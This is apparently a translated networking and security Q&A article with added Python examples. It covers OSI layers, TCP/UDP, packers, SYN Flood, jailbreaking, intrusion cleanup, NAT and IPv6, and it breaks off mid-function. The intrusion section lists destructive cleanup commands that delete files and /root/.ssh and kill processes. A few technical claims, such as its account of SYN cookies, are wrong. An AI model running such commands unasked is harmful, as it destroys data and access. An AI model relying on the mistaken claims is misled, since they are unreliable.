The data link layer provides services for the network layer and solves the communication problem between two adjacent nodes. The transmitted protocol data unit is called a data frame.

The data frame contains information such as physical address (also known as MAC address), control code, data and check code. The main function of this layer is to convert unreliable physical links into error-free data links for the network layer by means of verification, confirmation, and feedback retransmission.

In addition, the data link layer also coordinates the data transmission rate of the sending and receiving parties, that is, performs flow control to prevent the receiver from overflowing the buffer and blocking the line due to the lack of time to process the high-speed data from the sender.

(3) Network Layer

The network layer provides services for the transport layer, and the transmitted protocol data units are called data packets or packets. The main function of this layer is to solve the problem of how to transmit data packets through each node, that is, to send data packets to the destination through path selection algorithm (routing). In addition, in order to avoid network congestion caused by excessive data packets in the communication subnet, it is necessary to control the number of incoming data packets (congestion control). When data packets have to cross multiple communication subnets to reach their destination, the problem of Internet interconnection must also be solved.

(4) Transport Layer

The role of the transport layer is to provide end-to-end reliable and transparent data transmission services for upper layer protocols, including dealing with issues such as error control and flow control. This layer shields the details of the data communication of the lower layer from the upper layer, so that the upper layer users only see a reliable data path from host to host between two transmission entities, which can be controlled and set by the user.

The protocol data units transmitted by the transport layer are called segments or packets.

(5) Session Layer

The main function of the session layer is to manage and coordinate the communication (dialogue) between various processes on different hosts, that is, it is responsible for establishing, managing and terminating sessions between applications. The session layer gets its name because it is very similar to the concept of a session between two entities. For example, an interactive user session begins with logging on to a computer and ends with logging off.

(6) Presentation Layer

The presentation layer deals with the representation of the data encoding flowing through the nodes, so as to ensure that the information sent by the application layer of one system can be read by the application layer of another system. If necessary, this layer can provide a standard representation for converting various data representation formats inside the computer into the standard representation used in network communication. Data compression and encryption are also among the transformation functions that the presentation layer can provide.

(7) Application Layer

The application layer is the highest layer of the OSI reference model and is the interface between the user and the network. This layer completes the application requirements of network users through application programs, such as file transfer, sending and receiving e-mail, and so on.

17. The difference between TCP and UDP

Summary of the difference between the characteristics of the TCP protocol and the UDP protocol:

1. TCP numbers (labels) every data segment it transmits; UDP does not

2. TCP is reliable; UDP is unreliable

3. TCP is connection-oriented; UDP is connectionless

4. TCP carries more overhead and uses virtual circuits; UDP is connectionless with little overhead

5. A TCP sender needs confirmation that the receiver has received each data segment (acknowledgments; the connection itself is set up with a 3-way handshake)

6. TCP uses window technology (sliding windows) and flow control

When transmission performance must give way to the integrity, controllability and reliability of the data transfer, TCP is the natural choice. When performance matters more than integrity, as in audio and multimedia applications, UDP is the better choice. UDP is also a good choice when the exchange is so short that the connection setup would make up most of the traffic, such as a DNS query. Part of the reason SNMP is based on UDP is that its designers thought UDP's lower overhead would give it a better chance of delivering management data during network congestion. The rich functions of TCP sometimes lead to unpredictably low performance, but we believe that in the near future TCP's reliable point-to-point connections will be used by most network applications.
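The differences listed above are visible in the two headers themselves. The following is an added example (not code from the original article): it builds and decodes the 20-byte TCP header and the 8-byte UDP header with Python's struct module, then walks a constructed three-way handshake and two data segments so the sequence numbering can be followed. Port numbers, sequence numbers and the HTTP payload are made-up sample values; checksums are left at zero because they cover an IP pseudo-header that is out of scope here.

```python
import struct

# TCP flag bits in the low byte of the data-offset/flags word (RFC 793 layout; CWR/ECE/NS omitted)
TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def build_tcp(src_port, dst_port, seq, ack, flags, window, payload=b""):
    """Build a TCP segment with a 20-byte header and no options. Checksum stays 0 (see lead-in)."""
    data_offset_words = 5                                   # 5 x 32-bit words = 20 bytes
    off_flags = (data_offset_words << 12) | (flags & 0x1FF)
    header = struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack, off_flags, window, 0, 0)
    return header + payload


def parse_tcp(segment):
    """Decode the TCP header: every field UDP lacks (seq, ack, flags, window) lives here."""
    if len(segment) < 20:
        raise ValueError("TCP header needs at least 20 bytes")
    src_port, dst_port, seq, ack, off_flags, window, _cksum, _urg = struct.unpack("!HHIIHHHH", segment[:20])
    header_len = (off_flags >> 12) * 4
    if header_len < 20 or header_len > len(segment):
        raise ValueError("bad data offset")
    flag_bits = off_flags & 0x1FF
    return {
        "src_port": src_port, "dst_port": dst_port, "seq": seq, "ack": ack,
        "flags": [name for bit, name in TCP_FLAGS.items() if flag_bits & bit],
        "window": window, "header_len": header_len, "payload": segment[header_len:],
    }


def next_seq(tcp):
    """Sequence number the sender will use next: payload length, plus one for SYN and FIN,
    which is why the handshake description says the sequence number 'increases by one'."""
    consumed = len(tcp["payload"]) + ("SYN" in tcp["flags"]) + ("FIN" in tcp["flags"])
    return (tcp["seq"] + consumed) & 0xFFFFFFFF


def build_udp(src_port, dst_port, payload):
    """UDP header is just 8 bytes: two ports, a length and a checksum. No numbering, flags or window."""
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload


def parse_udp(datagram):
    if len(datagram) < 8:
        raise ValueError("UDP header needs 8 bytes")
    src_port, dst_port, length, _cksum = struct.unpack("!HHHH", datagram[:8])
    if length < 8 or length > len(datagram):
        raise ValueError("bad UDP length field")
    return {"src_port": src_port, "dst_port": dst_port, "length": length, "payload": datagram[8:length]}


def handshake_trace():
    """Constructed handshake (sample values, not captured traffic) followed by two data segments.
    Returns (flags, seq, ack) per segment so the numbering can be checked by eye."""
    client_isn, server_isn = 1000, 5000
    syn = build_tcp(40000, 80, client_isn, 0, 0x02, 65535)                                   # client -> server
    syn_ack = build_tcp(80, 40000, server_isn, next_seq(parse_tcp(syn)), 0x12, 65535)        # server -> client
    ack = build_tcp(40000, 80, next_seq(parse_tcp(syn)), next_seq(parse_tcp(syn_ack)), 0x10, 65535)
    a = parse_tcp(ack)
    data1 = build_tcp(40000, 80, a["seq"], a["ack"], 0x18, 65535, b"GET / HTTP/1.0\r\n")    # 16 bytes
    data2 = build_tcp(40000, 80, next_seq(parse_tcp(data1)), a["ack"], 0x18, 65535, b"\r\n")
    return [(p["flags"], p["seq"], p["ack"]) for p in map(parse_tcp, (syn, syn_ack, ack, data1, data2))]
```

Running handshake_trace() shows the client's sequence number move from 1000 (SYN) to 1001 (ACK and first data segment) to 1017 after 16 payload bytes, while the UDP parser has nothing comparable to track.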

18. Shelling

From a technical point of view, a shell (packer stub) is a piece of code that executes before the original program. During packing the code of the original program may be compressed and encrypted. When the packed file is executed, the shell runs before the original program, restores the compressed or encrypted code to the original program code, and then hands execution back to the original code. Software shells are divided into encryption shells, compression shells, camouflage shells, multi-layer shells, etc. Their purpose is to hide the program's real OEP (original entry point) and make it harder to crack.

"Packing" refers to protecting compiled EXE, DLL and other files by wrapping them in a shell; "unpacking" refers to removing the shell from the file and restoring the file to its state before packing. Shells come from program authors' need for resource compression and registration (licensing) protection. Shells are divided into three types: compression shells, password shells and encryption shells. As the name implies, compression shells only compress resources to reduce the program size; common compression shells include FSG, ASPack, UPX, Beidou, etc. Encryption shells are often called protective shells or "fierce shells"; they encrypt and protect the program's import table and other contents and have a good protective effect; common encryption shells include ASProtect, ACProtect, PELock, Phantom, etc. Password shells are not used much in practice; a program wrapped in a password shell can only run after the correct password is entered.
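Because a compression or encryption shell turns the original code into near-random bytes, the byte-entropy of a section is the usual first triage signal for a packed binary. The following is an added example, not code from the original article: it computes Shannon entropy per byte and compares a constructed plain "code section" with the same bytes after zlib compression and with pseudo-random bytes standing in for an encrypted section. The 7.0 bits/byte threshold is a common rule of thumb, chosen here as an assumption rather than taken from the article.

```python
import math
import random
import zlib
from collections import Counter


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for a single repeated value, up to 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())


def looks_packed(section, threshold=7.0):
    """Triage heuristic: compressed or encrypted code sections sit close to 8 bits/byte,
    while ordinary machine code and strings sit well below. Threshold is an assumption."""
    return shannon_entropy(section) >= threshold


def demo():
    """Constructed samples (not real binaries): a text-like 'code section', the same bytes once
    compressed (what a compression shell stores), and pseudo-random bytes (what an encryption
    shell stores). Returns the three entropies rounded to two decimals."""
    plain = b"".join(b"mov eax, [ebp+%d]; push eax; call func_%d; add esp, 4\n" % (i, i % 7)
                     for i in range(400))
    compressed = zlib.compress(plain, 9)
    rng = random.Random(2024)                      # fixed seed so the sample is reproducible
    encrypted_like = bytes(rng.getrandbits(8) for _ in range(4096))
    return {
        "plain": round(shannon_entropy(plain), 2),
        "compressed": round(shannon_entropy(compressed), 2),
        "random": round(shannon_entropy(encrypted_like), 2),
    }
```

In practice the same function is run over each section of a PE or ELF file; a .text section that scores near 8 bits/byte, combined with a tiny import table, is the classic sign of a packed sample that needs unpacking before static analysis.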

19. "Human flesh search"

This is a term coined by analogy, mainly to distinguish it from traditional search engines. It refers to a way of searching for information and resources by pooling the efforts of many netizens, combining machine search engines on the Internet (such as Baidu) with the information netizens have at hand in their daily lives [1].

20. The basic principle of SYN Flood

SYN Flood is currently one of the most popular DoS (denial of service) and DDoS (distributed denial of service) attack methods. It exploits the TCP connection-establishment process to exhaust the victim's resources (full CPU or insufficient memory). To understand the basic principle of this attack, we need to start from the process of establishing a TCP connection:

As we all know, TCP differs from UDP in that it is connection-based: to transfer TCP data between a server and a client, a virtual circuit, that is, a TCP connection, must be established first. The standard process for establishing a TCP connection is as follows:

First, the requester (client) sends a TCP message with the SYN (Synchronize) flag set. This synchronization message indicates the port the client uses and the initial sequence number of the TCP connection;

Second, after receiving the client's SYN message, the server returns a SYN+ACK message, indicating that the client's request is accepted, and at the same time the TCP sequence number is increased by one; ACK means acknowledgment.

Third, the client returns an acknowledgment message (ACK) to the server, again increasing the TCP sequence number by one, and at this point a TCP connection is complete.

The above connection process is called the three-way handshake in the TCP protocol. The problem lies in this handshake. Suppose a user crashes or drops offline right after sending the SYN message to the server. The server then never receives the client's ACK after sending its SYN+ACK response (the third handshake cannot be completed). In this case the server will generally retry (send SYN+ACK to the client again) and discard the unfinished connection after waiting for a period of time; the length of this period is called the SYN Timeout, and it is generally on the order of minutes (about 30 seconds to 2 minutes). It is not a big problem for one server thread to wait a minute because of one abnormal user, but if a malicious attacker simulates this situation in large numbers, the server has to maintain a very large half-open connection list, tens of thousands of entries, just to keep track of them; even simply storing and traversing such a list consumes a lot of CPU time and memory, not to mention continuously retrying SYN+ACK to every IP in the list. In fact, if the server's TCP/IP stack is not robust enough, the final result is often a stack overflow crash; even if the server system is strong enough, it is busy processing the attacker's forged TCP connection requests and has no time for normal client requests (which, after all, are a tiny proportion of the total). From the perspective of normal clients, the server stops responding. We call this situation a SYN Flood attack on the server.

From a defensive point of view, there are several simple solutions. The first is to shorten the SYN Timeout. Since the effect of a SYN Flood depends on the number of half-open SYN connections maintained on the server, and this number = SYN attack frequency x SYN Timeout, shortening the time from receiving a SYN message to declaring it invalid and discarding the connection, for example to under 20 seconds (too low a SYN Timeout may affect normal customer access), can reduce the server load several-fold.

The second method is to set a SYN cookie, that is, assign a cookie to each IP address that requests a connection. If repeated SYN messages are received from a certain IP within a short period of time, that IP is regarded as attacking and its subsequent packets are discarded.

However, the above two methods can only deal with relatively primitive SYN Flood attacks. Shortening the SYN Timeout only helps when the attacker's sending rate is not high, and the SYN cookie approach relies on the attacker using its real IP address. If the attacker sends SYN messages at a rate of 10,000 per second while using SOCK_RAW to randomly rewrite the source address in the IP header, the methods above are useless.
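The two quantities that the defensive discussion above turns on, the half-open table size (attack frequency x SYN Timeout) and the per-source SYN counter, can be checked with a small simulation. The following is an added example, not code from the original article, and it sends no packets: it feeds constructed SYN arrival events to a model of the server's half-open table and to a per-IP repeated-SYN filter of the kind described above. The rates, timeouts, window and threshold are assumed sample parameters; the addresses are from documentation ranges. The second scenario reproduces the caveat in the last paragraph: when every SYN carries a different forged source address, per-IP counting never triggers.

```python
import random
from collections import defaultdict, deque


def peak_half_open(syn_rate, syn_timeout, duration, step=1.0):
    """Model the server's half-open (SYN_RECV) table when every SYN is left unanswered.
    Each tick adds syn_rate*step entries and expires entries older than syn_timeout.
    Returns the peak table size, which settles at syn_rate * syn_timeout."""
    table = deque()                 # arrival times, oldest first
    peak, t = 0, 0.0
    while t < duration:
        while table and t - table[0] >= syn_timeout:
            table.popleft()         # server gave up on this half-open connection
        for _ in range(int(syn_rate * step)):
            table.append(t)
        peak = max(peak, len(table))
        t += step
    return peak


class RepeatedSynFilter:
    """Per-source measure as described above: a source that sends more than `threshold`
    SYNs inside `window` seconds is judged to be attacking and its further SYNs are dropped."""

    def __init__(self, window=10.0, threshold=50):
        self.window, self.threshold = window, threshold
        self.recent = defaultdict(deque)   # src_ip -> arrival times still inside the window

    def accept(self, src_ip, t):
        q = self.recent[src_ip]
        while q and t - q[0] >= self.window:
            q.popleft()
        q.append(t)
        return len(q) <= self.threshold


def run_flood(syn_filter, source_for_syn, syns_per_second=100, duration=30):
    """Feed constructed SYN arrivals (nothing is transmitted) and count how many pass the filter."""
    accepted = dropped = 0
    for second in range(duration):
        for _ in range(syns_per_second):
            if syn_filter.accept(source_for_syn(), float(second)):
                accepted += 1
            else:
                dropped += 1
    return {"accepted": accepted, "dropped": dropped}


def single_source_flood():
    """All SYNs from one documentation-range address: the filter catches it after `threshold` SYNs."""
    return run_flood(RepeatedSynFilter(), lambda: "203.0.113.7")


def spoofed_source_flood(seed=1):
    """Every SYN carries a different forged source: per-IP counting sees each address once."""
    rng = random.Random(seed)       # fixed seed so the sample run is reproducible

    def random_source():
        return ".".join(str(rng.getrandbits(8)) for _ in range(4))

    return run_flood(RepeatedSynFilter(), random_source)
```

peak_half_open(10, 60, 120) returns 600 entries and peak_half_open(10, 20, 120) returns 200, which is the several-fold reduction the text attributes to a shorter SYN Timeout. single_source_flood() drops all but the first 50 of 3,000 SYNs, while spoofed_source_flood() drops none of them, which is why production stacks fall back to stateless SYN cookies and upstream filtering for this case.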

 

21. What is a mobile phone "jailbreak"

The so-called jailbreaking of the iOS system is the act of obtaining the highest system privilege. The iOS system itself does not change qualitatively before and after the jailbreak, but after jailbreaking its capabilities can be used to the full.

Benefits of jailbreaking:

1. After jailbreaking, the device is more open to operate. With the highest privilege obtained, you can modify the phone's contents, including installing free cracked software, custom functions, beautification, etc.

2. After jailbreaking, you can bypass the App Store and download apps for free.

Disadvantages of jailbreaking:

1. The warranty is lost after jailbreaking.

2. After jailbreaking, background programs and desktop themes consume more power.

3. Jailbreaking breaks the closed nature of the iOS system, so the phone becomes relatively less secure.

22. The host has been invaded, how would you deal with it? Self-examination solution:

1. Check for viruses and Trojan horses.

1.1. Use netstat to check the network connections and analyze whether there is any suspicious outbound traffic; if there is, stop it. (For a common Linux Trojan family, the cleanup commands are:

    chattr -i /usr/bin/.sshd; rm -f /usr/bin/.sshd
    chattr -i /usr/bin/.swhd; rm -f /usr/bin/.swhd
    rm -f -r /usr/bin/bsd-port
    cp /usr/bin/dpkgd/ps /bin/ps
    cp /usr/bin/dpkgd/netstat /bin/netstat
    cp /usr/bin/dpkgd/lsof /usr/sbin/lsof
    cp /usr/bin/dpkgd/ss /usr/sbin/ss
    rm -r -f /root/.ssh
    find /proc/ -name exe | xargs ls -l | grep -v task | grep deleted | awk '{print $11}' | awk -F/ '{print $NF}' | xargs killall -9

The cp lines replace the tampered ps, netstat, lsof and ss with the copies kept under /usr/bin/dpkgd/; the last line kills every process whose executable file has been deleted from disk.)

1.2. Use antivirus software to scan and kill viruses.

2. Check and fix server vulnerabilities

2.1. Check whether there are abnormal server accounts; if so, disable and delete them.

2.2. Check whether the server has been logged into from another location; if so, change the password to a strong one (letters + numbers + special symbols, mixed case, 10 characters or more).

2.3. Check the management passwords of Jenkins, Tomcat, phpMyAdmin, WDCP and WebLogic, and increase the password strength (letters + numbers + special symbols, mixed case, 10 characters or more).

2.4. Check whether the web application has vulnerabilities, such as Struts, ElasticSearch, etc.; if so, upgrade.

2.5. Check MySQL, SQL Server, FTP, web management consoles and every other place where a password is set, and increase the password strength (letters + numbers + special symbols, mixed case, 10 characters or more).

2.6. Check for the Redis unauthenticated remote file-write vulnerability: look under /root/.ssh/ for SSH login key files created by the attacker and delete them, configure Redis to require a password and use a strong one, and if public network access is not needed, bind 127.0.0.1 so that only local access is allowed.

2.7. If any third-party software is installed, please follow the instructions on the official website to repair it.

3. Enable the cloud shield service, and enable all cloud shield security protection functions to protect your host from malicious attacks again.

Implement a security defense plan

Please start the cloud shield service as soon as possible. For details, please refer to: http://help.aliyun.com/view/11108300_13730770.html

At the same time, it is also recommended that you enable the cloud shield application firewall function. For details on how to enable it, see:

4. If the problem is still not resolved

If the problem still cannot be solved after the above handling, it is strongly recommended that you download and back up the data on the system disk and data disk to local storage and then reset the whole disk (log in to www.aliyun.com, go to My Aliyun > Management Console > Cloud Server ECS console, click the instance you need to initialize, stop the instance after backing up the server data, click "Reset Disk", and select the system disk and/or data disk to reset according to your actual situation), then redeploy the application, upload the data after cleaning it of the virus, and perform the 3 steps above again.
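Steps 1.1, 2.1 and 2.6 above can be turned into a read-only self-check that reports what a responder should look at before deleting anything. The following is an added example, not a script from the original article: it lists running processes whose executable has been deleted from disk (the same signal as the find /proc one-liner in step 1.1), flags extra UID-0 accounts and service accounts with a login shell (step 2.1), and enumerates every authorized_keys entry per user (step 2.6). The passwd file and key files in the demo are constructed samples; on a real host, pass the output of parse_passwd(open("/etc/passwd").read()) and the default file reader.

```python
import os
from collections import namedtuple

Account = namedtuple("Account", "name uid home shell")
KeyEntry = namedtuple("KeyEntry", "user path key_type comment")

# Constructed sample inputs for demo() below; not taken from any real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
deploy:x:1000:1000:deploy:/home/deploy:/bin/bash
sysadm:x:0:0::/tmp/.sysadm:/bin/sh
"""
SAMPLE_KEY_FILES = {
    "/root/.ssh/authorized_keys": "ssh-ed25519 AAAAC3EXAMPLEKEY1 ops@bastion\n\n\n\nssh-rsa AAAAB3EXAMPLEKEY2\n",
    "/home/deploy/.ssh/authorized_keys": "# deploy key\nssh-ed25519 AAAAC3EXAMPLEKEY3 ci@runner\n",
}
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def parse_passwd(text):
    accounts = []
    for line in text.splitlines():
        fields = line.split(":")
        if not line or line.startswith("#") or len(fields) != 7 or not fields[2].isdigit():
            continue
        accounts.append(Account(fields[0], int(fields[2]), fields[5], fields[6]))
    return accounts


def suspicious_accounts(accounts):
    """Step 2.1: any second UID-0 account, and system accounts that unexpectedly have a shell."""
    extra_uid0 = [a.name for a in accounts if a.uid == 0 and a.name != "root"]
    service_with_shell = [a.name for a in accounts if 0 < a.uid < 1000 and a.shell.endswith("sh")]
    return {"extra_uid0": extra_uid0, "service_with_shell": service_with_shell}


def read_if_exists(path):
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def authorized_keys(accounts, read_file=read_if_exists):
    """Step 2.6: every public key that grants SSH login, per user. Review any key you cannot
    attribute to a known person or system; a key without a comment deserves a second look."""
    entries = []
    for a in accounts:
        path = os.path.join(a.home, ".ssh", "authorized_keys")
        content = read_file(path)
        if content is None:
            continue
        for line in content.splitlines():
            parts = line.strip().split()
            if not parts or parts[0].startswith("#"):
                continue
            # the key type may be preceded by options such as command="..." or from="..."
            idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPE_PREFIXES)), None)
            if idx is None or idx + 1 >= len(parts):
                continue
            comment = " ".join(parts[idx + 2:])
            entries.append(KeyEntry(a.name, path, parts[idx], comment))
    return entries


def deleted_exe_processes(proc="/proc"):
    """Step 1.1 companion: processes whose executable was removed from disk, read-only."""
    found = []
    if not os.path.isdir(proc):
        return found
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc, pid, "exe"))
        except OSError:
            continue                      # kernel thread, already exited, or not ours to inspect
        if target.endswith(" (deleted)"):
            found.append((int(pid), target))
    return found


def demo():
    """Run the account and key checks over the constructed samples."""
    accounts = parse_passwd(SAMPLE_PASSWD)
    return {"accounts": suspicious_accounts(accounts),
            "keys": authorized_keys(accounts, read_file=SAMPLE_KEY_FILES.get)}
```

On the sample data the report names sysadm as a second UID-0 account and lists three keys, one of which (the ssh-rsa key in root's file, surrounded by blank lines and without a comment) is exactly the kind of entry step 2.6 tells you to examine.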


23. NAT (Network Address Translation) Protocol

Computers on the intranet use the NAT (Network Address Translation) protocol to access the Internet through a public gateway. Computers on the intranet can send connection requests to other computers on the Internet, but other computers on the Internet cannot send connection requests to computers on the intranet.

NAT (Network Address Translator) is network address translation: it converts between the IP addresses of the internal network and the addresses of the public network, mapping a large number of internal IP addresses onto one or a few public IP addresses and so reducing the number of public IP addresses needed. The most typical application of NAT is sharing one Internet connection in a local area network: only one computer needs to be connected to the Internet, and NAT lets the other computers in the LAN access the Internet through it. With NAT, computers on the LAN can reach computers on the Internet, but computers on the Internet cannot reach computers on the LAN.


Intranet reserved addresses

Internet designers reserved part of the IPv4 address space for private use. Addresses in that space are called private addresses. They are never allocated as public addresses, so a private address never collides with a public one.

The IPv4 private address blocks are:

    Class   Address range                    Default subnet mask
    A       10.0.0.0 - 10.255.255.255        255.0.0.0
    B       172.16.0.0 - 172.31.255.255      255.240.0.0
    C       192.168.0.0 - 192.168.255.255    255.255.0.0

The intranet can access the Internet only through a server or router acting as a gateway.

The gateway (server/router) has its own IP address, and the IP addresses of the other intranet computers are set relative to it: the first three numbers must be the same as the gateway's, and the fourth number can be chosen from 0-255 but must differ from the gateway's.

24. Intranet penetration

That is, NAT traversal: port mapping is used so that computers on the external network can reach computers on the internal network; web-based intranet penetration over HTTP/2 is another way to achieve it.

25. Virtual Private Network

Its function is to build a private network on top of the public network and carry out encrypted communication over it. It is widely used in enterprise networks. The VPN gateway provides remote access by encrypting data packets and translating their destination addresses. For example, when an employee on a business trip wants to reach server resources on the company intranet, that is remote access.

To let employees in other places access intranet resources, the VPN solution is to set up a VPN server on the intranet. The remote employee connects to the Internet locally, connects to the VPN server across the Internet, and then enters the corporate intranet through the VPN server. To keep the data safe, the traffic between the VPN server and the client is encrypted. With that encryption, the data can be regarded as travelling securely over a dedicated link, as if a private network had been built, although VPN in fact uses public links on the Internet; that is why it is called a virtual private network. In essence, VPN uses encryption to build a data tunnel over the public network. With VPN technology, users can reach intranet resources from a business trip or from home as long as they can get onto the Internet, which is why VPN is used so widely in enterprises.

26. Layer 2 switch

Layer 2 switches work at Layer 2 (the data link layer) of the OSI model, hence the name. Layer 2 switching technology is relatively mature. A Layer 2 switch is a data link layer device that can identify the MAC addresses in a frame, forward according to the destination MAC address, and record the MAC addresses it sees together with the corresponding ports in its own internal address table.

Process:

(1) When the switch receives a data packet from a certain port, it first reads the source MAC address in the packet header, so that it knows which port the machine with the source MAC address is connected to;

(2) Then read the destination MAC address in the packet header, and look up the corresponding port in the address table;

(3) If there is a port corresponding to the destination MAC address in the table, copy the data packet directly to this port;

(4) If the corresponding port cannot be found in the table, the data packet will be broadcast to all ports. When the destination machine responds to the source machine, the switch can learn which port the destination MAC address corresponds to. It is no longer necessary to broadcast to all ports.

This process is continuously cycled, and the MAC address information of the entire network can be learned. This is how a Layer 2 switch establishes and maintains its own address table.

27. Routing Technology

The router works at the third layer of the OSI model, the network layer. Its working mode is similar to Layer 2 switching, but because it operates at Layer 3, routing and switching use different control information when forwarding packets and implement the function in different ways. The working principle is that the router also has an internal table, which indicates which next hop to take to reach a given destination. If the next hop for a packet is known, the necessary information is added and the packet is forwarded; if it is not known, the packet is discarded and a message is returned to the source address.

Routing technology is essentially just two functions: determining the optimal route and forwarding data packets.

28. Layer 3 switch

A Layer 3 switch is a switch with some router functions. Its most important purpose is to speed up data exchange inside a large LAN. Regular work such as packet forwarding is done at high speed in hardware, while functions such as routing information updates, routing table maintenance, route calculation and route determination are done in software. Layer 3 switching technology is Layer 2 switching technology plus Layer 3 forwarding technology. Traditional switching operates at the second layer of the OSI model, the data link layer, whereas Layer 3 switching forwards packets at high speed at the third layer of the model, so it can perform the network routing function and adapt to different network conditions for the best network performance.
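Sections 26, 27 and 28 describe three pieces of forwarding logic: the four-step MAC learning process of a Layer 2 switch, the next-hop table lookup of a router, and their combination in a Layer 3 switch. The following is an added example (not code from the original article) that implements all three as small classes and runs constructed frames through them. Port numbers, MAC addresses, prefixes and next hops are made-up sample values; the router does longest-prefix match, which is the usual lookup rule and an assumption here since the text only says "where to go next".

```python
import ipaddress


class LearningSwitch:
    """Layer 2: learn source MAC -> ingress port, forward on the known port, otherwise flood."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.mac_table = {}                             # MAC -> port it was last seen on

    def forward(self, in_port, src_mac, dst_mac):
        self.mac_table[src_mac] = in_port               # step (1): learn where the sender lives
        out = self.mac_table.get(dst_mac)               # step (2): look up the destination
        if out is not None and out != in_port:
            return [out]                                # step (3): known, copy to that port only
        return [p for p in self.ports if p != in_port]  # step (4): unknown, flood all other ports


class Router:
    """Layer 3: longest-prefix match over a routing table; an unknown destination is dropped."""

    def __init__(self):
        self.routes = []                                # (network, next_hop, out_port)

    def add_route(self, prefix, next_hop, out_port):
        self.routes.append((ipaddress.ip_network(prefix), next_hop, out_port))
        self.routes.sort(key=lambda r: r[0].prefixlen, reverse=True)   # most specific first

    def lookup(self, dst_ip):
        addr = ipaddress.ip_address(dst_ip)
        for net, next_hop, port in self.routes:
            if addr in net:
                return next_hop, port
        return None                                     # no route: discard, report back to source


class Layer3Switch:
    """Layer 2 switching plus Layer 3 forwarding: frames for other hosts on the same segment are
    switched by MAC; frames addressed to the switch's own gateway MAC are routed by IP."""

    def __init__(self, ports, gateway_mac):
        self.l2 = LearningSwitch(ports)
        self.router = Router()
        self.gateway_mac = gateway_mac

    def handle(self, in_port, src_mac, dst_mac, dst_ip):
        if dst_mac != self.gateway_mac:
            return {"action": "switch", "ports": self.l2.forward(in_port, src_mac, dst_mac)}
        self.l2.mac_table[src_mac] = in_port            # still learn the sender's port
        route = self.router.lookup(dst_ip)
        if route is None:
            return {"action": "drop", "reason": "no route"}
        next_hop, port = route
        return {"action": "route", "next_hop": next_hop, "port": port}


HOST_A, HOST_B, GATEWAY = "02:00:00:00:00:0a", "02:00:00:00:00:0b", "02:00:00:00:00:01"


def switch_trace():
    """Three constructed frames on a 4-port switch: flood first, then unicast once learned."""
    sw = LearningSwitch([1, 2, 3, 4])
    return [sw.forward(1, HOST_A, HOST_B),   # B unknown: flood ports 2, 3, 4
            sw.forward(2, HOST_B, HOST_A),   # A was learned on port 1: unicast
            sw.forward(1, HOST_A, HOST_B)]   # B now learned on port 2: unicast


def routing_trace():
    """Constructed table: the /24 beats the /16, which beats the default route."""
    r = Router()
    r.add_route("0.0.0.0/0", "203.0.113.1", "wan")
    r.add_route("10.1.0.0/16", "10.0.0.2", "core")
    r.add_route("10.1.5.0/24", "10.0.0.3", "dmz")
    return [r.lookup(ip) for ip in ("10.1.5.9", "10.1.9.9", "198.51.100.7")]


def l3_switch_trace():
    """Same-subnet frame is switched; frame to the gateway MAC is routed or dropped."""
    l3 = Layer3Switch([1, 2], gateway_mac=GATEWAY)
    l3.router.add_route("192.168.2.0/24", "192.168.2.1", 2)
    return [l3.handle(1, HOST_A, HOST_B, "192.168.1.11"),
            l3.handle(1, HOST_A, GATEWAY, "192.168.2.7"),
            l3.handle(1, HOST_A, GATEWAY, "172.16.0.9")]
```

The traces make the division of labour concrete: the switch never looks at an IP address, the router never looks at a MAC address, and the Layer 3 switch decides between the two paths purely on whether the frame is addressed to its own gateway MAC.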

29. IPv6 address representation

The 128-bit IPv6 address is usually written as 8 groups, each group being four hexadecimal digits. For example, AD80:0000:0000:0000:ABAA:0000:00C2:0002 is a valid IPv6 address. An address this long is inconvenient to read and write, so zero compression is used to shorten it: if several consecutive groups are all 0, they can be replaced by ::, and the address above can be written as AD80::ABAA:0000:00C2:0002. Leading zeros within a group can also be omitted, so 2001:0DB8:02de::0e13 is equivalent to 2001:DB8:2de::e13.
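The two shortening rules above are easy to state and easy to get wrong at the edges (which run of zeros gets the ::, what happens to a single zero group, how :: is expanded back). The following is an added implementation, not code from the original article: expand() undoes :: and restores four digits per group, compress_zero_runs() applies zero compression, strip_leading_zeros() applies the second rule, and canonical() combines them into the RFC 5952 text form. It goes slightly beyond the paragraph by applying the RFC 5952 tie-break rules (a single zero group is never compressed; the longest run wins and the leftmost on a tie), and matches_stdlib() checks the result against Python's ipaddress module.

```python
import ipaddress

HEX_DIGITS = set("0123456789abcdefABCDEF")


def expand(addr):
    """Undo '::' and restore each group to four hex digits (letter case is preserved)."""
    if addr.count("::") > 1:
        raise ValueError("at most one '::' is allowed")
    if "::" in addr:
        left, right = addr.split("::")
        lgroups = left.split(":") if left else []
        rgroups = right.split(":") if right else []
        missing = 8 - len(lgroups) - len(rgroups)
        if missing < 1:
            raise ValueError("'::' must stand for at least one group")
        groups = lgroups + ["0"] * missing + rgroups
    else:
        groups = addr.split(":")
    if len(groups) != 8 or any(not 1 <= len(g) <= 4 or set(g) - HEX_DIGITS for g in groups):
        raise ValueError("malformed IPv6 address: %r" % addr)
    return ":".join(g.zfill(4) for g in groups)


def compress_zero_runs(addr):
    """Zero compression: replace the longest run of all-zero groups with '::'.
    RFC 5952 rules (assumed here): runs of one group stay; on a tie the leftmost run wins."""
    groups = expand(addr).split(":")
    best_start, best_len = -1, 0
    i = 0
    while i < 8:
        if int(groups[i], 16) != 0:
            i += 1
            continue
        j = i
        while j < 8 and int(groups[j], 16) == 0:
            j += 1
        if j - i > best_len:
            best_start, best_len = i, j - i
        i = j
    if best_len < 2:
        return ":".join(groups)
    return ":".join(groups[:best_start]) + "::" + ":".join(groups[best_start + best_len:])


def strip_leading_zeros(addr):
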